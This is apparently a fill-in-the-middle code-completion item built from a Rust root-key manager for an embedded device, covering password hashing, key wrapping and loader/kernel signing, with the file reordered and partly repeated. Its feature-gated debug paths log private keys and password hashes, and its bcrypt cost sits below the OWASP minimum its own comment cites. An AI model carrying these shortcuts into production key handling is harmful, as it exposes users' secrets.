*word = *word ^ u32::from_be_bytes(key_word.try_into().unwrap());
}
}
update_progress(50, progress_modal, progress_action);
// set the "init" bit in the staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
sensitive_slice[KeyRomLocs::CONFIG as usize] |= keyrom_config::INITIALIZED.ms(1);
}
update_progress(60, progress_modal, progress_action);
#[cfg(feature = "hazardous-debug")]
{
log::info!("Self private key: {:x?}", keypair.secret.to_bytes());
log::info!("Self public key: {:x?}", keypair.public.to_bytes());
self.debug_staging();
}
// Because we're initializing keys for the *first* time, make a backup copy of the bitstream to
// the staging area. Note that if we're doing an update, the update target would already be
// in the staging area, so this step should be skipped.
self.make_gateware_backup(60, 70, progress_modal, progress_action);
// compute the keyrom patch set for the bitstream
// at this point the KEYROM as replicated in sensitive_slice should have all its assets in place
patch::should_patch(42);
// finalize the progress bar on exit -- always leave at 100%
update_progress(100, progress_modal, progress_action);
true
}
fn make_gateware_backup(&mut self, prog_start: u32, prog_end: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
// println!("this is a test of stdlib");
}
#[cfg(feature = "hazardous-debug")]
fn debug_staging(&self) {
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PRIVKEY as usize, 256, "Self private key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PUBKEY as usize, 256, "Self public key: ");
self.debug_print_key(KeyRomLocs::DEVELOPER_PUBKEY as usize, 256, "Dev public key: ");
self.debug_print_key(KeyRomLocs::THIRDPARTY_PUBKEY as usize, 256, "3rd party public key: ");
self.debug_print_key(KeyRomLocs::USER_KEY as usize, 256, "Boot key: ");
self.debug_print_key(KeyRomLocs::PEPPER as usize, 128, "Pepper: ");
self.debug_print_key(KeyRomLocs::CONFIG as usize, 32, "Config (as BE): ");
}
#[cfg(feature = "hazardous-debug")]
fn debug_print_key(&self, offset: usize, num_bits: usize, name: &str) {
use core::fmt::Write;
let mut debugstr = xous_ipc::String::<4096>::new();
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
write!(debugstr, "{}", name).unwrap();
for word in sensitive_slice[offset .. offset as usize + num_bits/(size_of::<u32>()*8)].iter() {
for byte in word.to_be_bytes().iter() {
write!(debugstr, "{:02x}", byte).unwrap();
}
}
log::info!("{}", debugstr);
}
pub fn sign_loader(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let loader_len =
xous::LOADER_CODE_LEN
- SIGBLOCK_SIZE
+ graphics_server::fontmap::FONT_TOTAL_LEN as u32
+ 8; // two u32 words are appended to the end, which repeat the "version" and "length" fields encoded in the signature block
// this is a huge hash, so, get a hardware hasher, even if it means waiting for it
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let loader_region = self.loader_code.as_slice::<u8>();
// the loader data starts one page in; the first page is reserved for the signature itself
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
// now get the font plane data
self.gfx.bulk_read_restart(); // reset the bulk read pointers on the gfx side
let bulkread = BulkRead::default();
let mut buf = xous_ipc::Buffer::into_buf(bulkread).expect("couldn't transform bulkread into aligned buffer");
// this form of loop was chosen to avoid the multiple re-initializations and copies that would be entailed
// in our usual idiom for passing buffers around. Instead, we create a single buffer and re-use it for
// every iteration of the loop.
loop {
buf.lend_mut(self.gfx.conn(), self.gfx.bulk_read_fontmap_op()).expect("couldn't do bulkread from gfx");
let br = buf.as_flat::<BulkRead, _>().unwrap();
hasher.update(&br.buf[..br.len as usize]);
if br.len != bulkread.buf.len() as u32 {
log::trace!("non-full block len: {}", br.len);
}
if br.len < bulkread.buf.len() as u32 |
}
if false { // this path is for debugging the loader hash. It spoils the loader signature in the process.
let digest = hasher.finalize();
log::info!("len: {}", loader_len);
log::info!("{:x?}", digest);
// fake hasher for now
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
} else {
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
}
}
pub fn sign_kernel(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let kernel_region = self.kernel.as_slice::<u8>();
// for the kernel length, we can't know/trust the given length in the signature field, so we sign the entire
// length of the region. This will increase the time it takes to verify; however, at the current trend, we'll probably
// use most of the available space for the kernel, so by the time we're done maybe only 10-20% of the space is empty.
let kernel_len = kernel_region.len() - SIGBLOCK_SIZE as usize;
hasher.update(&kernel_region[SIGBLOCK_SIZE as usize ..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the kernel"), kernel_len as u32)
}
/// Called by the UX layer at the epilogue of the initialization run. Allows suspend/resume to resume,
/// and zero-izes any sensitive data that was created in the process.
pub fn finish_key_init(&mut self) {
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
// zeroize the RAM-backed data
for data in sensitive_slice.iter_mut() {
*data = 0;
}
// re-allow suspend/resume ops
self.susres.set_suspendable(true).expect("couldn't re-allow suspend/resume");
}
}
fn update_progress(new_state: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
log::info!("progress: {}", new_state);
progress_action.set_state(new_state);
progress_modal.modify(
Some(gam::modal::ActionType::Slider(*progress_action)),
None, false, None, false, None);
progress_modal.redraw(); // stage the modal box pixels to the back buffer
progress_modal.gam.redraw().expect("couldn't cause back buffer to be sent to the screen");
xous::yield_slice(); // this gives time for the GAM to do the sending
}
| {
// read until we get a buffer that's not fully filled
break;
} | conditional_block |
implementation.rs | use gam::FONT_TOTAL_LEN;
use ticktimer_server::Ticktimer;
use utralib::generated::*;
use crate::api::*;
use core::num::NonZeroUsize;
use num_traits::*;
use gam::modal::{Modal, Slider};
use crate::bcrypt::*;
use crate::api::PasswordType;
use core::convert::TryInto;
use ed25519_dalek::{Keypair, Signature, Signer};
use engine_sha512::*;
use digest::Digest;
use graphics_server::BulkRead;
use core::mem::size_of;
use root_keys::key2bits::*;
// TODO: add hardware acceleration for BCRYPT so we can hit the OWASP target without excessive UX delay
const BCRYPT_COST: u32 = 7; // 10 is the minimum recommended by OWASP; takes 5696 ms to verify @ 10 rounds; 804 ms to verify 7 rounds
/// Size of the total area allocated for signatures. It is equal to the size of one FLASH sector, which is the smallest
/// increment that can be erased.
const SIGBLOCK_SIZE: u32 = 0x1000;
#[repr(C)]
struct SignatureInFlash {
pub version: u32,
pub signed_len: u32,
pub signature: [u8; 64],
}
struct KeyRomLocs {}
#[allow(dead_code)]
impl KeyRomLocs {
const FPGA_KEY: u8 = 0x00;
const SELFSIGN_PRIVKEY: u8 = 0x08;
const SELFSIGN_PUBKEY: u8 = 0x10;
const DEVELOPER_PUBKEY: u8 = 0x18;
const THIRDPARTY_PUBKEY: u8 = 0x20;
const USER_KEY: u8 = 0x28;
const PEPPER: u8 = 0xf8;
const FPGA_MIN_REV: u8 = 0xfc;
const LOADER_MIN_REV: u8 = 0xfd;
const CONFIG: u8 = 0xff;
}
pub struct KeyField {
mask: u32,
offset: u32,
}
impl KeyField {
pub const fn new(width: u32, offset: u32) -> Self {
let mask = (1 << width) - 1;
KeyField {
mask,
offset,
}
}
pub fn ms(&self, value: u32) -> u32 {
let ms_le = (value & self.mask) << self.offset;
ms_le.to_be()
}
}
#[allow(dead_code)]
pub(crate) mod keyrom_config {
use crate::KeyField;
pub const VERSION_MINOR: KeyField = KeyField::new(8, 0 );
pub const VERSION_MAJOR: KeyField = KeyField::new(8, 8 );
pub const DEVBOOT_DISABLE: KeyField = KeyField::new(1, 16);
pub const ANTIROLLBACK_ENA: KeyField = KeyField::new(1, 17);
pub const ANTIROLLFORW_ENA: KeyField = KeyField::new(1, 18);
pub const FORWARD_REV_LIMIT: KeyField = KeyField::new(4, 19);
pub const FORWARD_MINOR_LIMIT: KeyField = KeyField::new(4, 23);
pub const INITIALIZED: KeyField = KeyField::new(1, 27);
}
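// Illustrative example (added for clarity; not part of the original source): KeyField::ms()
// masks the value to the field's width, shifts it to the field's bit offset, and byte-swaps
// the result so it can be OR'd directly into the big-endian words staged for the KEYROM.
// The test below is a hypothetical sketch that just restates that arithmetic.
#[cfg(test)]
mod keyfield_example {
    use crate::KeyField;
    #[test]
    fn ms_masks_shifts_and_byteswaps() {
        // INITIALIZED is a 1-bit field at bit offset 27, so ms(1) is (1 << 27), byte-swapped
        let initialized = KeyField::new(1, 27);
        assert_eq!(initialized.ms(1), (1u32 << 27).to_be());
        // values wider than the field are masked down to the field width first
        let version_minor = KeyField::new(8, 0);
        assert_eq!(version_minor.ms(0x1ff), 0xffu32.to_be());
    }
}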
/// This structure is mapped into the password cache page and can be zero-ized at any time
/// we avoid using fancy Rust structures because everything has to "make sense" after a forced zero-ization
/// The "password" here is generated as follows:
/// `user plaintext (up to first 72 bytes) -> bcrypt (24 bytes) -> sha512trunc256 -> [u8; 32]`
/// The final sha512trunc256 expansion is because we will use this to XOR against secret keys stored in
/// the KEYROM that may be up to 256 bits in length. For shorter keys, the hashed password is simply truncated.
#[repr(C)]
struct PasswordCache {
hashed_boot_pw: [u8; 32],
hashed_boot_pw_valid: u32, // non-zero for valid
hashed_update_pw: [u8; 32],
hashed_update_pw_valid: u32,
}
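// Hedged sketch (added for illustration; not in the original file): this is how the 32-byte
// hashed password above is intended to be used -- XORed byte-for-byte against a wrapped
// 256-bit key read back out of the KEYROM. `keys` (a RootKeys) and `pcache` (a &PasswordCache)
// are placeholder names; read_key_256 and KeyRomLocs are defined later in this file.
//
//   let wrapped = keys.read_key_256(KeyRomLocs::USER_KEY);
//   let mut unwrapped = [0u8; 32];
//   for (dst, (&w, &pw)) in unwrapped.iter_mut()
//       .zip(wrapped.iter().zip(pcache.hashed_boot_pw.iter())) {
//       *dst = w ^ pw; // XOR undoes the wrap applied at key-init time
//   }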
pub(crate) struct RootKeys {
keyrom: utralib::CSR<u32>,
gateware: xous::MemoryRange,
staging: xous::MemoryRange,
loader_code: xous::MemoryRange,
kernel: xous::MemoryRange,
/// regions of RAM that hold all plaintext passwords, keys, and temp data. They are kept in two well-defined pages so we can
/// zero-ize it upon demand, without guessing about stack frames and/or Rust optimizers removing writes
sensitive_data: xous::MemoryRange, // this gets purged at least on every suspend, but ideally purged sooner than that
pass_cache: xous::MemoryRange, // this can be purged based on a policy, as set below
boot_password_policy: PasswordRetentionPolicy,
update_password_policy: PasswordRetentionPolicy,
cur_password_type: Option<PasswordType>, // for tracking which password we're dealing with at the UX layer
susres: susres::Susres, // for disabling suspend/resume
trng: trng::Trng,
gam: gam::Gam, // for raising UX elements directly
gfx: graphics_server::Gfx, // for reading out font planes for signing verification
spinor: spinor::Spinor,
}
impl RootKeys {
pub fn new(xns: &xous_names::XousNames) -> RootKeys {
let keyrom = xous::syscall::map_memory(
xous::MemoryAddress::new(utra::keyrom::HW_KEYROM_BASE),
None,
4096,
xous::MemoryFlags::R | xous::MemoryFlags::W,
)
.expect("couldn't map keyrom CSR range");
// read-only memory maps. even if we don't refer to them, we map them into our process
// so that no other processes can claim them
let gateware = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_MAIN_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_MAIN_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC gateware region");
let staging = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_STAGING_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_STAGING_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC staging region");
let loader_code = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::LOADER_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::LOADER_CODE_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the loader code region");
let kernel = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::KERNEL_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::KERNEL_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the kernel region");
let sensitive_data = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let pass_cache = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let spinor = spinor::Spinor::new(&xns).expect("couldn't connect to spinor server");
spinor.register_soc_token().expect("couldn't register rootkeys as the one authorized writer to the gateware update area!");
let keys = RootKeys {
keyrom: CSR::new(keyrom.as_mut_ptr() as *mut u32),
gateware,
staging,
loader_code,
kernel,
sensitive_data,
pass_cache,
update_password_policy: PasswordRetentionPolicy::AlwaysPurge,
boot_password_policy: PasswordRetentionPolicy::AlwaysKeep,
cur_password_type: None,
susres: susres::Susres::new_without_hook(&xns).expect("couldn't connect to susres without hook"),
trng: trng::Trng::new(&xns).expect("couldn't connect to TRNG server"),
gam: gam::Gam::new(&xns).expect("couldn't connect to GAM"),
gfx: graphics_server::Gfx::new(&xns).expect("couldn't connect to gfx"),
spinor
};
keys
}
fn purge_password(&mut self, pw_type: PasswordType) {
unsafe {
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
match pw_type {
PasswordType::Boot => {
for p in (*pcache_ptr).hashed_boot_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_boot_pw_valid = 0;
}
PasswordType::Update => {
for p in (*pcache_ptr).hashed_update_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_update_pw_valid = 0;
}
}
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
fn purge_sensitive_data(&mut self) {
let data = self.sensitive_data.as_slice_mut::<u32>();
for d in data.iter_mut() {
*d = 0;
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
pub fn suspend(&mut self) {
match self.boot_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Boot);
}
}
match self.update_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Update);
}
}
self.purge_sensitive_data();
}
pub fn resume(&mut self) {
}
pub fn update_policy(&mut self, policy: Option<PasswordRetentionPolicy>) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected policy update from the UX");
return;
};
if let Some(p) = policy {
match pw_type {
PasswordType::Boot => self.boot_password_policy = p,
PasswordType::Update => self.update_password_policy = p,
};
} else {
match pw_type {
PasswordType::Boot => self.boot_password_policy = PasswordRetentionPolicy::AlwaysPurge,
PasswordType::Update => self.update_password_policy = PasswordRetentionPolicy::AlwaysPurge,
};
}
// once the policy has been set, revert the current type to None
self.cur_password_type = None;
}
/// Plaintext password is passed as a &str. Any copies internally are destroyed. Caller is responsible for destroying the &str original.
/// Performs a bcrypt hash of the password, with the currently set salt; does not store the plaintext after exit.
pub fn hash_and_save_password(&mut self, pw: &str) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected password from the UX");
return;
};
let mut hashed_password: [u8; 24] = [0; 24];
let mut salt = self.get_salt();
// we change the salt ever-so-slightly for every password. This doesn't make any one password more secure;
// but it disallows guessing all the passwords with a single off-the-shelf hashcat run.
salt[0] ^= pw_type as u8;
let timer = ticktimer_server::Ticktimer::new().expect("couldn't connect to ticktimer");
// the bcrypt function takes the plaintext password and makes one copy to prime the blowfish bcrypt
// cipher. It is responsible for erasing this state.
let start_time = timer.elapsed_ms();
bcrypt(BCRYPT_COST, &salt, pw, &mut hashed_password); // note: this internally makes a copy of the password, and destroys it
let elapsed = timer.elapsed_ms() - start_time;
log::info!("bcrypt cost: {} time: {}ms", BCRYPT_COST, elapsed); // benchmark to figure out how to set cost parameter
// expand the 24-byte (192-bit) bcrypt result into 256 bits, so we can use it directly as XOR key material
// against 256-bit AES and curve25519 keys
// for such a small hash, software is the most performant choice
let mut hasher = engine_sha512::Sha512Trunc256::new(Some(engine_sha512::FallbackStrategy::SoftwareOnly));
hasher.update(hashed_password);
let digest = hasher.finalize();
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
unsafe {
match pw_type {
PasswordType::Boot => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_boot_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_boot_pw_valid = 1;
}
PasswordType::Update => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_update_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_update_pw_valid = 1;
}
}
}
}
/// Reads a 256-bit key at a given index offset
fn read_key_256(&mut self, index: u8) -> [u8; 32] {
let mut key: [u8; 32] = [0; 32];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Reads a 128-bit key at a given index offset
fn read_key_128(&mut self, index: u8) -> [u8; 16] {
let mut key: [u8; 16] = [0; 16];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Returns the `salt` needed for the `bcrypt` routine.
/// This routine handles the special-case of being uninitialized: in that case, we need to get
/// salt from a staging area, and not our KEYROM. However, `setup_key_init` must be called
/// first to ensure that the staging area has a valid salt.
fn get_salt(&mut self) -> [u8; 16] {
if !self.is_initialized() {
// we're not initialized, use the salt that should already be in the staging area
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
let mut key: [u8; 16] = [0; 16];
for (word, &keyword) in key.chunks_mut(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter()) {
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} else {
self.read_key_128(KeyRomLocs::PEPPER)
}
}
/// Called by the UX layer to track which password we're currently requesting
pub fn set_ux_password_type(&mut self, cur_type: Option<PasswordType>) {
self.cur_password_type = cur_type;
}
/// Called by the UX layer to check which password request is in progress
pub fn get_ux_password_type(&self) -> Option<PasswordType> {self.cur_password_type}
pub fn is_initialized(&mut self) -> bool {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
if config & keyrom_config::INITIALIZED.ms(1) != 0 {
true
} else {
false
}
}
/// Called by the UX layer to set up a key init run. It disables suspend/resume for the duration
/// of the run, and also sets up some missing fields of KEYROM necessary to encrypt passwords.
pub fn setup_key_init(&mut self) {
// block suspend/resume ops during security-sensitive operations
self.susres.set_suspendable(false).expect("couldn't block suspend/resume");
// in this block, keyrom data is copied into RAM.
// make a copy of the KEYROM to hold the new mods, in the sensitive data area
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for addr in 0..256 {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, addr);
sensitive_slice[addr as usize] = self.keyrom.rf(utra::keyrom::DATA_DATA);
}
// provision the pepper
for keyword in sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter_mut() {
*keyword = self.trng.get_u32().expect("couldn't get random number");
}
}
/// Core of the key initialization routine. Requires a `progress_modal` dialog box that has been set
/// up with the appropriate notification messages by the UX layer, and a `Slider` type action which
/// is used to report the progress of the initialization routine. We assume the `Slider` box is set
/// up to report progress on a range of 0-100%.
///
/// This routine dispatches the following activities:
/// - generate signing private key (encrypted with update password)
/// - generate rootkey (encrypted with boot password)
/// - generate signing public key
/// - set the init bit
/// - sign the loader
/// - sign the kernel
/// - compute the patch set for the FPGA bitstream
/// - do the patch (whatever that means - gotta deal with the AES key, HMAC etc.)
/// - verify the FPGA image hmac
/// - sign the FPGA image
/// - get ready for a reboot
/// - returns true if we should reboot (everything succeeded)
/// - returns false if we had an error condition (don't reboot)
pub fn do_key_init(&mut self, progress_modal: &mut Modal, progress_action: &mut Slider) -> bool {
// kick the progress bar to indicate we've entered the routine
update_progress(1, progress_modal, progress_action);
let keypair: Keypair = Keypair::generate(&mut self.trng);
// pub key is easy, no need to encrypt
let public_key: [u8; ed25519_dalek::PUBLIC_KEY_LENGTH] = keypair.public.to_bytes();
{ // scope sensitive_slice narrowly, as it borrows *self mutably, and can mess up later calls that borrow an immutable self
// sensitive_slice is our staging area for the new keyrom contents
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in public_key.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PUBKEY as usize..KeyRomLocs::SELFSIGN_PUBKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
// extract the update password key from the cache, and apply it to the private key
let pcache: &PasswordCache = unsafe{&*(self.pass_cache.as_mut_ptr() as *mut PasswordCache)};
#[cfg(feature = "hazardous-debug")]
{
log::info!("cached boot passwords {:x?}", pcache.hashed_boot_pw);
log::info!("cached update password: {:x?}", pcache.hashed_update_pw);
}
// private key must XOR with password before storing
let mut private_key_enc: [u8; ed25519_dalek::SECRET_KEY_LENGTH] = [0; ed25519_dalek::SECRET_KEY_LENGTH];
// we do it this way to make as few copies of the hashed password as possible
for (dst, (plain, key)) in
private_key_enc.iter_mut()
.zip(keypair.secret.to_bytes().iter()
.zip(pcache.hashed_update_pw.iter())) {
*dst = plain ^ key;
}
// store the private key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PRIVKEY as usize..KeyRomLocs::SELFSIGN_PRIVKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
} |
// generate and store a root key (aka boot key), this is what is unlocked by the "boot password"
// ironically, it's a "lower security" key because it just acts as a gatekeeper to further
// keys that would have a stronger password applied to them, based upon the importance of the secret
// think of this more as a user PIN login confirmation, than as a significant cryptographic event
let mut boot_key_enc: [u8; 32] = [0; 32];
for (dst, key) in
boot_key_enc.chunks_mut(4).into_iter()
.zip(pcache.hashed_boot_pw.chunks(4).into_iter()) {
let key_word = self.trng.get_u32().unwrap().to_be_bytes();
// just unroll this loop, it's fast and easy enough
(*dst)[0] = key[0] ^ key_word[0];
(*dst)[1] = key[1] ^ key_word[1];
(*dst)[2] = key[2] ^ key_word[2];
(*dst)[3] = key[3] ^ key_word[3];
// note: strictly speaking, we wouldn't have to XOR with the hashed boot password here --
// this key isn't used by this routine, just initialized -- it only matters that it is XORed
// with the password by the time it's first used to encrypt something. Doing it now simply
// means the wrapped (encrypted) form is what gets staged below.
}
// store the boot key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in boot_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::USER_KEY as usize..KeyRomLocs::USER_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(20, progress_modal, progress_action);
// sign the loader
let (loader_sig, loader_len) = self.sign_loader(&keypair);
update_progress(30, progress_modal, progress_action);
// sign the kernel
let (kernel_sig, kernel_len) = self.sign_kernel(&keypair);
update_progress(40, progress_modal, progress_action);
// encrypt the FPGA key using the update password. in an un-init system, it is provided to us in plaintext format
// e.g. in the case that we're doing a BBRAM boot (eFuse flow would give us a 0's key and we'd later on set it)
#[cfg(feature = "hazardous-debug")]
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key before encryption: ");
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (word, key_word) in sensitive_slice[KeyRomLocs::FPGA_KEY as usize..KeyRomLocs::FPGA_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()
.zip(pcache.hashed_update_pw.chunks(4).into_iter()) {
*word = *word ^ u32::from_be_bytes(key_word.try_into().unwrap());
}
}
update_progress(50, progress_modal, progress_action);
// set the "init" bit in the staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
sensitive_slice[KeyRomLocs::CONFIG as usize] |= keyrom_config::INITIALIZED.ms(1);
}
update_progress(60, progress_modal, progress_action);
#[cfg(feature = "hazardous-debug")]
{
log::info!("Self private key: {:x?}", keypair.secret.to_bytes());
log::info!("Self public key: {:x?}", keypair.public.to_bytes());
self.debug_staging();
}
// Because we're initializing keys for the *first* time, make a backup copy of the bitstream to
// the staging area. Note that if we're doing an update, the update target would already be
// in the staging area, so this step should be skipped.
self.make_gateware_backup(60, 70, progress_modal, progress_action);
// compute the keyrom patch set for the bitstream
// at this point the KEYROM as replicated in sensitive_slice should have all its assets in place
patch::should_patch(42);
// finalize the progress bar on exit -- always leave at 100%
update_progress(100, progress_modal, progress_action);
true
}
fn make_gateware_backup(&mut self, prog_start: u32, prog_end: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
// println!("this is a test of stdlib");
}
#[cfg(feature = "hazardous-debug")]
fn debug_staging(&self) {
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PRIVKEY as usize, 256, "Self private key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PUBKEY as usize, 256, "Self public key: ");
self.debug_print_key(KeyRomLocs::DEVELOPER_PUBKEY as usize, 256, "Dev public key: ");
self.debug_print_key(KeyRomLocs::THIRDPARTY_PUBKEY as usize, 256, "3rd party public key: ");
self.debug_print_key(KeyRomLocs::USER_KEY as usize, 256, "Boot key: ");
self.debug_print_key(KeyRomLocs::PEPPER as usize, 128, "Pepper: ");
self.debug_print_key(KeyRomLocs::CONFIG as usize, 32, "Config (as BE): ");
}
#[cfg(feature = "hazardous-debug")]
fn debug_print_key(&self, offset: usize, num_bits: usize, name: &str) {
use core::fmt::Write;
let mut debugstr = xous_ipc::String::<4096>::new();
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
write!(debugstr, "{}", name).unwrap();
for word in sensitive_slice[offset .. offset as usize + num_bits/(size_of::<u32>()*8)].iter() {
for byte in word.to_be_bytes().iter() {
write!(debugstr, "{:02x}", byte).unwrap();
}
}
log::info!("{}", debugstr);
}
pub fn sign_loader(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let loader_len =
xous::LOADER_CODE_LEN
- SIGBLOCK_SIZE
+ graphics_server::fontmap::FONT_TOTAL_LEN as u32
+ 8; // two u32 words are appended to the end, which repeat the "version" and "length" fields encoded in the signature block
// this is a huge hash, so, get a hardware hasher, even if it means waiting for it
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let loader_region = self.loader_code.as_slice::<u8>();
// the loader data starts one page in; the first page is reserved for the signature itself
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
// now get the font plane data
self.gfx.bulk_read_restart(); // reset the bulk read pointers on the gfx side
let bulkread = BulkRead::default();
let mut buf = xous_ipc::Buffer::into_buf(bulkread).expect("couldn't transform bulkread into aligned buffer");
// this form of loop was chosen to avoid the multiple re-initializations and copies that would be entailed
// in our usual idiom for passing buffers around. Instead, we create a single buffer and re-use it for
// every iteration of the loop.
loop {
buf.lend_mut(self.gfx.conn(), self.gfx.bulk_read_fontmap_op()).expect("couldn't do bulkread from gfx");
let br = buf.as_flat::<BulkRead, _>().unwrap();
hasher.update(&br.buf[..br.len as usize]);
if br.len != bulkread.buf.len() as u32 {
log::trace!("non-full block len: {}", br.len);
}
if br.len < bulkread.buf.len() as u32 {
// read until we get a buffer that's not fully filled
break;
}
}
if false { // this path is for debugging the loader hash. It spoils the loader signature in the process.
let digest = hasher.finalize();
log::info!("len: {}", loader_len);
log::info!("{:x?}", digest);
// fake hasher for now
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
} else {
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
}
}
pub fn sign_kernel(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let kernel_region = self.kernel.as_slice::<u8>();
// for the kernel length, we can't know/trust the given length in the signature field, so we sign the entire
// length of the region. This will increase the time it takes to verify; however, at the current trend, we'll probably
// use most of the available space for the kernel, so by the time we're done maybe only 10-20% of the space is empty.
let kernel_len = kernel_region.len() - SIGBLOCK_SIZE as usize;
